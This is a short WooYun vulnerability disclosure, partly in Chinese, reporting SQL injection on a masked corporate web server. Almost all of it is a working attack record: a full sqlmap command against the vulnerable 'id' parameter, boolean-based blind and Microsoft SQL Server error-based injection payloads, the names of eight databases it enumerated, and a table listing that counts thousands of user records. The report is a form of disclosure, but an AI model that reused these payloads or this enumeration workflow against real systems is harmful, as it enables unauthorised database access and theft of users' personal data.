WooYun.org

1,注入信息:sqlmap -u "http://**.**.**.**/web/news.do?action=detail&id=201512080544313224*" --batch
2,poc
---
Parameter: #1* (URI)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: http://**.**.**.**:80/web/news.do?action=detail&id=201512080544313224' AND 9728=9728 AND 'POHG'='POHG
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: http://**.**.**.**:80/web/news.do?action=detail&id=201512080544313224' AND 3697=CONVERT(INT,(SELECT CHAR(113)+CHAR(118)+CHAR(106)+CHAR(120)+CHAR(113)+(SELECT (CASE WHEN (3697=3697) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(112)+CHAR(112)+CHAR(113)+CHAR(113))) AND 'vtUM'='vtUM
---
[00:01:16] [INFO] the back-end DBMS is Microsoft SQL Server
web application technology: JSP
back-end DBMS: Microsoft SQL Server 2005
available databases [8]:
[*] goldwind
[*] goldwind1
[*] jinfeng1
[*] master
[*] model
[*] msdb
[*] tempdb
[*] xhrcms
3,每个库都有不少的表,还有几千的用户信息
Database: jinfeng1
+----------------+---------+
| Table | Entries |
+----------------+---------+
| dbo.hr_article | 40738 |
| dbo.hr_user | 3758 |
| dbo.hr_class | 154 |
| dbo.hr_channel | 121 |
| dbo.hr_ctcache | 38 |
| dbo.hr_jobs | 38 |
| dbo._zhaoxy | 15 |
| dbo.D99_CMD | 15 |
| dbo.S3_Tmp | 15 |
| dbo.kill_kk | 13 |
| dbo.foofoofoo | 10 |
| **.**.**.**d_list | 9 |
| dbo.hr_cmmword | 2 |
| dbo.D99_REG | 1 |
| dbo.D99_Tmp | 1 |
| dbo.hr_admin | 1 |
| dbo.hr_jobset | 1 |
| dbo.hr_system | 1 |
| dbo.jiaozhu | 1 |
| dbo.X_3734 | 1 |
+----------------+---------+
4,我就不一一举例了